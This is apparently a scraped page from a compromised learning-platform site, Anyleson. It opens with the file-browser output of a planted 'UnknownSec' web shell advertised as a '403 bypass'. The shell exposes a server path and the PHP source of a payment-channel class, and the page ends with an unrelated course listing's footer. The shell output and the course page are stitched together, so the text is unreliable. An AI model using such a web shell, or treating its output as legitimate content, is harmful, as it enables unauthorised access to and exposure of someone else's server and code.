shell bypass 403

UnknownSec Shell

: /home/anyleson/www/app/PaymentChannels/ [ drwxr-xr-x ]

name : ChannelManager.php
<?php
namespace App\PaymentChannels;

use App\Models\Order;
use App\Models\PaymentChannel;

class ChannelManager
{
    /**
     * @param PaymentChannel $paymentChannel
     * @return IChannel
     */
    public static function makeChannel(PaymentChannel $paymentChannel){
        $className = "App\\PaymentChannels\\Drivers\\{$paymentChannel->class_name}\\Channel";
        return new $className($paymentChannel);
    }

    /**
     * @param Order $order
     * @return string
     */
    public static function makeCallbackUrl(Order $order)
    {
        return "";
    }
}

© 2025 UnknownSec
Installment and Secure Host | Anyleson - Learning Platform
INR (₹)
India Rupee
$
United States Dollar
Installment and Secure Host

Installment and Secure Host

in Business Strategy
5.00
(1 Ratings)
Created by Jessica Wray

Report course

Please describe about the report short and clearly.

Share

Share course with your friends

Buy with points